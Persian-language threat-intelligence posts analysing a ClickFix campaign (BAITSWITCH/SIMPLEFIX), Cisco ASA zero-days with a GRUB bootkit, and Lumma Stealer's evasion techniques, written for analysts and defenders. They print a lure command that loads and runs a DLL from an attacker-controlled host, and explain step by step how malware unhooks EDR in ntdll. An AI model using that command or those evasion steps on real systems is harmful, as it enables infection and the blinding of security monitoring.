1. طراحی فریب: قربانی به صفحه‌ای هدایت می‌شود که خود را به عنوان یک منبع اطلاعاتی برای فعالان مدنی روس معرفی می‌کند. این صفحه یک چک‌باکس جعلی Cloudflare Turnstile نمایش می‌دهد.

2. اجرای دستوری: با کلیک کاربر، کد JavaScript صفحه یک دستور مخرب (rundll32.exe \\captchanom.top\check\machinerie.dll,verifyme) را در کلیپ‌بورد کپی می‌کند. سپس کاربر فریب داده می‌شود تا این دستور را در دیالوگ باکس Windows Run (Win + R) جای‌گذاری و اجرا کند.

3. فایل فریب (Decoy): بلافاصله پس از اجرا، قربانی به یک داکیومنت فریبنده با میزبانی Google Drive هدایت می‌شود تا توجه وی از فرآیند آلودگی منحرف شود.
این اقدام منجر به اجرای فایل machinerie.dll که همان بدافزار BAITSWITCH است، از طریق تابع rundll32.exe می‌شود.

۲۔ BAITSWITCH: مهندسی پایداری و Staging
۔ BAITSWITCH (Machinerie.dll) یک Downloader چند وظیفه‌ای است که وظیفه اصلی آن برقراری پایداری و آماده‌سازی سیستم برای استقرار SIMPLEFIX است.

الف. تکنیک‌های دفاعی

*۔ Traffic Signaling: این بدافزار از یک User-Agent استرینگ (Mozilla/5.0...Chrome/131.0.0.0 Safari/537.36 Edge/133.0.0.0) برای برقراری ارتباط با سرور C2 استفاده می‌کند. سرور C2 تنها در صورت دریافت این User-Agent مشخص پاسخ می‌دهد و در غیر این صورت، پاسخ 404 Not Found ارسال می‌کند. این یک مکانیزم ساده و مؤثر برای جلوگیری از تحلیل خودکار و شناسایی توسط ساندباکس‌ها است.

# ب. زنجیره فرماندهی (Command Chain)

۔BAITSWITCH یک توالی پنج مرحله‌ای از درخواست‌های HTTP به دامنه‌های تحت کنترل مهاجم (captchanom[.]top) را اجرا می‌کند که هر کدام منجر به اجرای دستورات حیاتی می‌شوند:

1۔ Persistence: اجرای دستور reg add برای تنظیم کلید رجیستری UserInitMprLogonScript در HKCU\Environment. این کلید تضمین می‌کند که اسکریپت PowerShell نهایی در ورود بعدی کاربر به سیستم اجرا شود.

2۔ Fileless Storage : اجرای PowerShell برای ذخیره اسکریپت مخرب نهایی که به‌صورت Base64-encoded و AES-encrypted است و همچنین کلید Decryption آن، در کلیدهای رجیستری (مانند EnthusiastMode و QatItems ) مربوط به یک CLSID کاذب. این یک تکنیک Defense Evasion قوی برای پنهان کردن Payload است.

3۔ Download Stager: دانلود اسکریپت Stager اولیه PowerShell و ذخیره آن در مسیر %APPDATA% (همان فایلی که در مرحله پایداری به آن ارجاع داده شده است).

4۔ Indicator Removal: حذف کلید رجیستری RunMRU که حاوی تاریخچه دستورات اجرا شده در دیالوگ باکس Run است، برای پاک کردن ردپای حمله ClickFix.

5۔ Victim Registration: ارسال نام میزبان (Hostname) قربانی به C2 برای ثبت موفقیت‌آمیز آلودگی.

۳۔ SIMPLEFIX: Backdoor مبتنی بر PowerShell و جمع‌آوری اطلاعات

در ورود مجدد کاربر، اسکریپت Stager اولیه اجرا می‌شود. این اسکریپت به‌صورت Fileless ، اسکریپت AES-encrypted را از رجیستری خوانده، آن را با استفاده از ترکیب کلید Hardcoded و پارامتر خط فرمان، رمزگشایی و اجرا می‌کند. خروجی نهایی، بدافزار SIMPLEFIX است.

# الف. مکانیزم‌های C2 و شناسایی (Discovery)

*۔ Beaconing (ارسال سیگنال): SIMPLEFIX هر ۳ دقیقه یک بار اقدام به برقراری ارتباط با C2 (southprovesolutions[.]com) می‌کند.

*۔ User-Agent داینامیک: SIMPLEFIX یک User-Agent منحصر به فرد با ترکیب نام کامپیوتر، نام کاربری و UUID ماشین تولید می‌کند که در تمام درخواست‌های C2 گنجانده می‌شود. این تکنیک به مهاجم کمک می‌کند تا قربانیان را در سمت سرور به دقت شناسایی کند (T1033).

✅#Cisco

🔥 از Zero-Day RCE سیسکو (CVE-2025-20333)
تا بوت‌کیت RayInitiator در GRUB 💀

تحلیل آسیب‌پذیری و بهره‌برداری در Cisco

سیر تحولی یک رویداد امنیتی حیاتی در پلتفرم‌های Cisco Secure Firewall ASA و FTD و یک عملیات سایبری بسیار پیشرفته و Zero-Day در سطح APT است که مستلزم اقدامات دفاعی فوری می‌باشد.

خلاصه و ترکیب آسیب‌پذیری‌ها (CVE Correlation)

آسیب‌پذیری اصلی، نقص بحرانی Remote Code Execution (RCE) در مؤلفه VPN Web Server است که هنگام فعال بودن سرویس‌های AnyConnect SSL VPN یا Webvpn قابل بهره‌برداری است.

CVE-2025-20333 => ۹.۹ (Critical) => هسته RCE => Buffer Overflow (CWE-120)
آسیب‌پذیری اصلی RCE: امکان اجرای کد دلخواه با دسترسی Root. بهره‌برداری فعال توسط APT**ها. رسماً نیاز به **Credentials VPN دارد.

CVE-2025-20362 => ۶.۵ (Medium) => پیش‌نیاز (Pre-Auth) => Unauthorized Access
نقص دور زدن احراز هویت: مهاجم را قادر می‌سازد تا بدون Credential به Endpointهای محدود VPN دست یابد. پتانسیل بالای اتصال به CVE-2025-20333 در یک Attack Chain.

CVE-2025-20363 => ۹.۰ (Critical) => گزارش اولیه => Input Validation Flaw (CWE-122)
گزارش اولیه و ناهمگون: مربوط به Input Validation. احتمالاً یک نقص کلی مرتبط یا گزارش اولیه است که توسط CVE-2025-20333 با دقت بیشتری (Buffer Overflow) توصیف شد.

نکته فنی: هرچند CVE-2025-20333 رسماً نیاز به احراز هویت دارد، اما وجود CVE-2025-20362 یک تهدید جدی برای ایجاد زنجیره حمله (Attack Chain) فراهم می‌کند که می‌تواند نیاز به Credential معتبر را حذف کرده و RCE را به یک عملیات Pre-Authentication RCE تبدیل کند.

تحلیل APT و بدافزارهای استقراری

این کمپین توسط یک عامل تهدید دولتی (State-Sponsored Threat Actor) با هدف جاسوسی سایبری انجام شده و از یک ابزار جنگی دو مرحله‌ای بسیار پیشرفته استفاده می‌کند:

۱۔ RayInitiator (بوت‌کیت: Persistence در سطح GRUB)

این بدافزار، یک Multi-Stage Bootkit است که مستقیماً برای ایجاد پایداری (Persistence) عمیق و مقاوم طراحی شده است.

* مکانیسم: RayInitiator خود را در Grand Unified Bootloader (GRUB) دستگاه Flash می‌کند.

* مزیت APT: این مکانیسم به بدافزار اجازه می‌دهد تا از ریبوت‌های سیستمی و حتی بروزرسانی‌های معمول Firmware جان سالم به در ببرد و یک Foot-hold دائمی و بسیار دشوار برای حذف ایجاد کند.

* هدف: به‌طور خاص مدل‌های قدیمی‌تر Cisco ASA 5500-X Series را هدف قرار می‌دهد که فاقد فناوری Secure Boot هستند.

۲۔ LINE VIPER (Payload Memory-Resident: ضد بدافزارکاوی)

این بدافزار، یک Shellcode Loader است که مستقیماً در حافظه (Memory-Resident) اجرا می‌شود و بخش اصلی کنترل مهاجم را فراهم می‌کند:

* اجرای فرمان: امکان اجرای دستورات با بالاترین سطح دسترسی (Privilege Level 15).

۔ Data Exfiltration تخصصی: قابلیت انجام Packet Capture مخفیانه از پروتکل‌های احراز هویت حیاتی شبکه شامل RADIUS، LDAP و TACACS برای سرقت Credentials (اعتبارنامه‌ها).

۔ Evasion و Anti-Forensics: یکی از پیشرفته‌ترین تاکتیک‌های آن، قابلیت ریبوت فوری دستگاه در صورت تلاش مدیران برای گرفتن Core Dump یا اجرای دستورات خاص تحلیلی است. این اقدام، تلاش‌های تحلیلگران برای بدافزارکاوی (Malware Analysis) را مختل می‌کند.

۔ C2 پیچیده: استفاده از کانال‌های رمزگذاری‌شده HTTPS WebVPN و همچنین یک کانال ثانویه C2 با استفاده از ICMP Tunneling درون یک جلسه VPN، که شناسایی ارتباطات فرمان و کنترل را بسیار سخت می‌کند.

نتیجه‌گیری و راهکارهای مقابله پیشرفته

با توجه به ماهیت APT و سطح نفوذ (Root Shell و Bootkit)، تنها راه مقابله، مدیریت سریع Incident و اعمال تغییرات ساختاری است.

الف) راهکار حاد و فوری (Emergency Response)

۱۔ Patching اضطراری (Urgent Patching): هیچ Workaround مؤثری وجود ندارد. سازمان‌ها باید فوراً تمامی دستگاه‌های ASA/FTD را با استفاده از Cisco Software Checker به آخرین نسخه‌های اصلاح‌شده ارتقاء دهند.

۲۔ Audit پیکربندی VPN: با استفاده از دستور show running-config ، فعال بودن سرویس‌های Webvpn یا AnyConnect SSL VPN را بررسی و در صورت عدم امکان Patching فوری، آن‌ها را موقتاً غیرفعال کنید (با علم به تأثیر آن بر Business Continuity).

۳. شکار تهدید (Threat Hunting):

* در اسرع وقت قوانین YARA مرتبط با RayInitiator و LINE VIPER را در سیستم‌های تشخیص تهدید (Threat Detection Systems) خود پیاده‌سازی کنید.

* مراقب شاخص آلودگی (IOC) کلیدی باشید: هرگونه ریبوت غیرمنتظره دستگاه ASA پس از تلاش برای گرفتن Core Dump، باید به‌عنوان یک هشدار قطعی آلودگی به LINE VIPER تلقی شود.

✅#LummaStealer

🟥 ظهور تکامل یافته‌تر بدافزار Lumma Stealer

بدافزار Lumma Stealer که توسط مجرمان سایبری در بخش‌های مختلف (از جمله مخابرات، بهداشت، بانکداری و بازاریابی) مورد استفاده قرار می‌گرفت، با واریانت‌های جدید ظاهر و نشان‌دهنده یک تهدید سایبری جاری و تکامل یافته‌تر است.

* ساختار و زنجیره آلودگی

تحلیل نمونه‌ای از این بدافزار با هش 87118baadfa7075d7b9d2aff75d8e730 نشان می‌دهد که Lumma Stealer از ابزارهای قانونی برای پنهان‌کاری استفاده می‌کند، تاکتیکی که اغلب توسط APTها برای دور زدن راهکارهای امنیتی سنتی به کار می‌رود.

1. بسته نصب‌کننده: نمونه تحلیل‌شده یک فایل NSIS (Nullsoft Scriptable Install System) است. مهاجمان با سوءاستفاده از این ابزارهای قانونی و پرکاربرد، نرخ تشخیص اولیه را پایین نگه می‌دارند.

2. استخراج اجزا: پس از استخراج (توسط ابزاری مانند 7z)، دو جزء کلیدی ظاهر می‌شوند:

الف " [NSIS].nsi: یک اسکریپت NSIS Obfuscated که زنجیره آلودگی را با فراخوانی Parish.m4a آغاز می‌کند.

ب : Parish.m4a: یک (Batch File) مبهم‌سازی شده که مسئول اجرای مرحله بعد است. سایر فایل‌های با پسوند *.m4a حاوی Blobs داده‌های رمزنگاری شده برای Payload اصلی هستند.

3. سوءاستفاده از AutoIt: اسکریپت دسته‌ای، فایل اجرایی قانونی autoit3.exe را به همراه یک فایل اسکریپت مخرب با پسوند .a3x اجرا می‌کند. AutoIt یک زبان اسکریپت‌نویسی قانونی برای اتوماسیون وظایف در ویندوز است، اما در اینجا برای مقاصد غیرقانونی مورد سوءاستفاده قرار می‌گیرد.

4. کد مبهم‌سازی شده AutoIt: اسکریپت A3X با استفاده از تکنیک‌هایی مانند حلقه while و ساختار switch-case مبهم‌سازی شده تا تحلیل استاتیک آن دشوار باشد. پس از ابهام‌زدایی، اسکریپت نهایی حاوی منطق اصلی بدافزار از جمله تکنیک‌های پایداری و فرار است.

* مکانیزم های فرار پیشرفته

بدافزار Lumma Stealer از چندین تکنیک پیشرفته و سطح بالا برای جلوگیری از تحلیل در محیط‌های Sandbox و ابزارهای امنیتی استفاده می‌کند:

۱. بررسی محیط اجرا

بدافزار پیش از اجرای کامل Payload، محیط را برای تشخیص Sandbox یا ماشین‌های مجازی اسکن می‌کند. این کار با بررسی موارد زیر صورت می‌گیرد:

* نام کامپیوتر (COMPUTERNAME)

* نام کاربری (USERNAME)

* وجود پردازش‌های ابزار مجازی‌سازی: جستجوی پردازش‌هایی مانند vmtoolsd.exe (VMware), VboxTray.exe (VirtualBox) و SandboxieRpcSs.exe (Sandboxie).

* وجود پردازش‌های آنتی‌ویروس: جستجوی پردازش‌هایی مانند avastui.exe.

۲. تکنیک (Anti-debugging)

این بدافزار از اختلاف در مدیریت زمان و سرعت اجرا بین سیستم‌های واقعی و محیط‌های تحلیلی سوءاستفاده می‌کند. این تاکتیک با اندازه‌گیری زمان صرف‌شده برای اجرای یک قطعه کد یا توقف‌های مصنوعی، می‌تواند حضور یک دیباگر را تشخیص دهد.

۳. بررسی (Anti-analysis)

این نمونه تلاش می‌کند تا با پینگ کردن یک دامنه‌ی ساختگی/غیرواقعی (Fabricated Domain) ، محیط را بررسی کند. اگر دامنه در دسترس باشد، ممکن است نشان‌دهنده یک محیط کنترل‌شده (مانند Sandbox) باشد که ترافیک شبکه را شبیه‌سازی می‌کند. در این صورت، پردازش AutoIt خودکشی (self-terminates) می‌کند.

۴. انجام (DLL Unhooking)

این یک تکنیک پیشرفته دفاعی است که اغلب در بدافزارهای APT level دیده می‌شود.

* نرم‌افزارهای امنیتی (مانند EDRها) برای نظارت و مسدود کردن فراخوانی‌های حیاتی API ویندوز (مثل NtCreateProcess در ntdll.dll)، شروع توابع را Hook می‌کنند (یعنی بایت‌های اولیه تابع را تغییر می‌دهند تا اجرا به کد امنیتی هدایت شود).

*۔ Lumma Stealer با بازیابی بایت‌های اصلی و Unhook شده تابع در حافظه، کنترل امنیتی را باطل می‌کند و اجازه می‌دهد فراخوانی‌های مخرب API بدون نظارت اجرا شوند.

۵. مکانیزم پایداری
بدافزار برای حفظ دسترسی در سیستم آلوده، از روش ایجاد یک میانبر اینترنتی (.url) در پوشه Startup ویندوز استفاده می‌کند. این میانبر پس از راه‌اندازی سیستم، یک JScript را اجرا می‌کند که با استفاده از Wnoscript.Shell ، Payload نهایی AutoIt را مجدداً اجرا می‌کند.

مرحله (Next-Stage Payload)

بدافزار Lumma Stealer از تکنیک‌های رمزگشایی و فشرده‌سازی در حافظه برای پنهان کردن Payload نهایی استفاده می‌کند:

* رمزگشایی در حافظه: بدافزار با استفاده از یک تابع خودتعریف، داده‌های رمزنگاری شده را رمزگشایی می‌کند.

* فشرده‌سازی برای پنهان‌کاری بیشتر و کاهش حجم، بدافزار از API ویندوز RtlDecompressFragmentWindows استفاده کرده و داده‌ها را با فرمت LZ Compression (پارامتر 0x2) از حالت فشرده خارج می‌کند.

🟥 مهندسی معکوس: تکنیک DLL Unhooking در بدافزارهای APT

در یک محیط آزمایشگاهی، درک اینکه بدافزاری مانند Lumma Stealer چگونه لایه‌های دفاعی را باطل می‌کند، مستلزم شناخت عمیق از معماری سیستم‌عامل ویندوز و نحوه کارکرد راهکارهای امنیتی نظیر EDR (Endpoint Detection and Response) است.

۱. مکانیزم Hooking توسط راهکارهای امنیتی

راهکارهای امنیتی مدرن (مانند آنتی‌ویروس‌ها و EDRها) برای نظارت بر فعالیت‌های حیاتی یک فرآیند ویندوز، از مکانیزم API Hooking استفاده می‌کنند.

1۔ DLLهای هدف: عموماً توابع حیاتی ویندوز که در DLLهای سطح پایین مانند ntdll.dll (شامل توابع Native API مانند NtCreateProcess , NtWriteFile , NtAllocateVirtualMemory ) و kernel32.dll قرار دارند، هدف این تکنیک هستند.

2۔ فرآیند (Inline Hooking)

* هنگامی که یک فرآیند (مثلاً فرآیند Lumma Stealer) شروع به کار می‌کند، EDR به فضای آدرس آن فرآیند تزریق می‌شود.

* ۔EDR بایت‌های اولیه (Preamble) تابع هدف در حافظه (مثلاً تابع NtCreateProcess در ntdll.dll) را بازنویسی می‌کند.

* این بایت‌های بازنویسی شده معمولاً شامل دستورات JMP یا CALL هستند که اجرای طبیعی تابع را به یک قطعه کد رهگیری در داخل کتابخانه EDR هدایت می‌کنند.

* نتیجه: پیش از اینکه فراخوانی سیستم (Syscall) واقعی به کرنل برسد، EDR فرصت دارد که آرگومان‌ها را بررسی کرده و در صورت مخرب بودن، آن را مسدود کند.

۲. مکانیزم Unhooking توسط بدافزار (Lumma Stealer)

بدافزار Lumma Stealer و سایر بدافزارهای APT برای فرار از این نظارت، این فرآیند را معکوس می‌کنند:

1. هدف: بازگرداندن حافظه تابع Hook شده به حالت اصلی و تمیز آن.

2. منبع داده اصلی: بدافزار برای به دست آوردن کدهای اصلی و Unhook شده، از تکنیک‌های زیر استفاده می‌کند:

* بارگیری مجدد DLL : بدافزار می‌تواند نسخه تمیز DLL هدف (مثلاً ntdll.dll) را مجدداً بارگیری کند، اما نه در فضایی که توسط ویندوز استفاده می‌شود (معمولاً با استفاده از LoadLibraryEx با پرچم‌های خاص). سپس بایت‌های اولیه تابع هدف را از این نسخه جدید خوانده و کپی می‌کند.

* خواندن از دیسک: بدافزار می‌تواند به طور مستقیم فایل DLL اصلی (مثلاً C:\Windows\System32\ntdll.dll ) را از دیسک بخواند و Preamble اصلی تابع را استخراج کند. این روش رایج‌تر و قابل اعتمادتر است، چرا که نسخه روی دیسک (معمولاً) دستکاری نشده است.

3. بازنویسی حافظه (Memory Overwrite):

* بدافزار تابع VirtualProtect را فراخوانی می‌کند تا دسترسی به حافظه آن بخش از ntdll.dll را از READ/EXECUTE به READ/WRITE/EXECUTE تغییر دهد.

* بایت‌های اصلی استخراج‌شده (Preamble تمیز) را روی حافظه تابع Hook شده کپی می‌کند.

* دسترسی حافظه را دوباره به حالت اولیه READ/EXECUTE برمی‌گرداند.

نتیجه Unhooking: از این لحظه به بعد، هر فراخوانی سیستم از داخل فرآیند بدافزار به آن تابع (مثلاً NtCreateProcess) مستقیماً به هسته سیستم عامل هدایت می‌شود و راهکار امنیتی (EDR) در عمل کور می‌شود و نمی‌تواند آن فعالیت را نظارت یا مسدود کند.

پیاده‌سازی و تحلیل در محیط آزمایشگاهی

ابزارهای مورد نیاز:

*۔ Debugger/Disassembler: IDA Pro / Ghidra / x64dbg

* زبان برنامه‌نویسی: Python (برای اسکریپت‌نویسی) و ++C یا Assembly (برای ساخت PoC)

* سیستم‌عامل: ویندوز ۱۰/۱۱ (در محیط VM)

مراحل شبیه‌سازی دفاعی (Defense PoC):

برای درک عمیق‌تر، می‌توانیم یک PoC (Proof of Concept) با Python و کتابخانه ctypes برای تزریق کد یا یک DLL ساده با ++C/C برای Hooking بسازیم.

1۔ Hooking اولیه: تابعی را در ntdll.dll (مانند NtResumeThread) انتخاب کرده و یک JMP به تابع رهگیری خودتان تزریق کنید.

2۔ تحلیل Unhooking (Reverse Engineering):

* بدافزار Lumma Stealer را در x64dbg اجرا کنید.

*۔ Breakpoint را روی توابع کلیدی ویندوز تنظیم کنید:

*۔ LoadLibraryExW: برای رصد تلاش جهت بارگیری مجدد ntdll.dll.

*۔ CreateFileW / ReadFile: برای رصد تلاش برای خواندن ntdll.dll از دیسک.

*۔ VirtualProtect: این مهم‌ترین Breakpoint است. هر فراخوانی به VirtualProtect که دسترسی حافظه DLLهای سیستمی را به WRITE تغییر دهد، نشان‌دهنده یک Unhooking قریب‌الوقوع است.

با دنبال کردن اجرای کد پس از VirtualProtect ، می‌توانید دقیقاً متوجه شوید که بدافزار چگونه بایت‌های اصلی را محاسبه یا بازیابی کرده و آن‌ها را بر روی حافظه Hook شده می‌نویسد.

@NullError_ir

🟥 خودکشی فرآیند (Process Self-Termination) یعنی چه؟

مکانیزم پیشرفته ضدتحلیل

خودکشی پردازشی یا Self-Termination یکی از تاکتیک‌های کلیدی در بدافزارهای مدرن مانند Lumma Stealer است. این تکنیک یک اقدام دفاعی نهایی است که بدافزار برای جلوگیری از تحلیل خود در محیط‌های کنترل‌شده، مانند Sandboxها و ماشین‌های مجازی (VMs) به کار می‌گیرد.

بر خلاف پایان دادن عادی به یک فرآیند (ExitProcess) ، خودکشی پردازشی در بدافزارها با یک مکانیزم تصمیم‌گیری پیشرفته گره خورده است که بر مبنای یافته‌های (Anti-Analysis) عمل می‌کند.

۱. معماری تصمیم‌گیری (Decision Architecture)

خودکشی پردازشی هرگز به صورت تصادفی رخ نمی‌دهد، بلکه نتیجه شکست بدافزار در عبور از تست‌های محیطی است. این فرآیند از الگوریتم‌های شرطی تو در تو (Nested Conditional Logic) استفاده می‌کند:

بررسی فرآیندها/فایل‌های VM (مانند vmtoolsd.exe , VBoxGuestAdditions.sys)

بررسی نام‌های سیستمی (مانند COMPUTERNAME یا USERNAME پیش‌فرض Sandboxها)

بررسی زمان‌بندی و وقفه (Timing and Delay) اجرای سریع و نرم دستورات

بررسی (Debugger Presence) عدم یافتن پرچم BeingDebugged

تست ارتباط شبکه (Fabricated Domain Ping) عدم پاسخگویی به دامنه‌ی ساختگی

۲. مکانیزم‌های فنی خودکشی (Technical Self-Termination Methods)

پس از اینکه بدافزار از طریق تست‌های بالا به قطعیت رسید که در حال تحلیل است، از یکی از روش‌های زیر برای پایان دادن به فرآیند خود استفاده می‌کند:

الف) فراخوانی مستقیم API (Direct API Call)

ساده‌ترین و رایج‌ترین روش، فراخوانی توابع Native API برای خاتمه دادن به فرآیند جاری است:

۔* ExitProcess: این تابع سطح بالا در kernel32.dll است و رایج‌ترین روش خاتمه دادن به فرآیند است.

۔* NtTerminateProcess: این تابع Native API در ntdll.dll است و یک فراخوانی سطح پایین‌تر به هسته است. در بدافزارهای مدرن، اغلب از این تابع استفاده می‌شود تا احتمال Hooking توسط EDRها کمتر شود.

NtTerminateProcess( (HANDLE)-1, 0 );

👆 -1 نشان‌دهنده فرآیند جاری است

ب) تولید استثنای کشنده (Generating Fatal Exception)

یک روش پیشرفته‌تر و پنهان‌تر، مجبور کردن سیستم‌عامل به خاتمه دادن به فرآیند از طریق تولید یک خطای غیرقابل بازیابی (Fatal Exception) است. این کار می‌تواند تحلیلگر را گمراه کند:

* فراخوانی RaiseException با کد خطا: بدافزار می‌تواند عمداً یک استثناء با کدهای خطای خاص (مثلاً STATUS_ILLEGAL_INSTRUCTION) ایجاد کند. اگر بدافزار در یک محیط Sandbox بدون مدیریت استثناء فعال باشد، سیستم‌عامل به سادگی فرآیند را خاتمه می‌دهد.

* دستورات Assembly غیرقانونی (Illegal Instructions): اجرای مستقیم دستورات اسمبلی نامعتبر (مانند INT 3 برای دیباگرها یا دستوراتی که پردازنده فعلی پشتیبانی نمی‌کند) می‌تواند منجر به خطای سخت‌افزاری و خاتمه فرآیند شود.

ج) Self-Overwrite و پاکسازی حافظه (Self-Overwrite and Memory Cleansing)

پیشرفته‌ترین بدافزارها قبل از خودکشی، بخشی از حافظه حیاتی خود را Overwrite کرده یا Unmap می‌کنند.

* هدف: جلوگیری از استخراج Payload نهایی یا کلیدهای رمزگشایی در لحظه مرگ فرآیند.

* روش: استفاده از توابعی مانند VirtualFree برای آزاد کردن نواحی تخصیص یافته حافظه (به خصوص نواحی حاوی Payload مرحله بعد) یا بازنویسی بخش‌های کد با داده‌های تصادفی/صفر (Zero-out) قبل از فراخوانی ExitProcess .

۳. خودکشی هوشمند (Smart Self-Termination) در بدافزارهای امروزی

در بدافزارهای APT، خودکشی پردازشی صرفاً یک پایان ساده نیست، بلکه بخشی از یک استراتژی دفاعی است:

1۔ Delay and Exit: بدافزار ممکن است تشخیص دهد که در حال تحلیل است، اما به جای خاتمه فوری، برای مدت کوتاهی به اجرای عملیات‌های بی‌ضرر ادامه می‌دهد (مثلاً خوابیدن برای یک مدت طولانی با SleepEx یا حلقه‌های طولانی) و سپس به طور ناگهانی خاتمه می‌یابد. این کار باعث می‌شود ابزارهای تحلیل خودکار، قبل از رسیدن به نقطه خودکشی، به دلیل محدودیت زمان اجرا، تحلیل را متوقف کنند و گزارش دهند که بدافزار "فعالیتی نداشته است".

2۔ Clean Exit vs. Crash Exit: بدافزارهای پیچیده تمایل دارند از Clean Exit (خاتمه تمیز با API مانند ExitProcess) استفاده کنند تا فرآیند به طور ناگهانی "Crash" نشود و گزارش خطا یا Dumps حافظه ایجاد نشود که بتواند توسط تحلیلگر بررسی شود.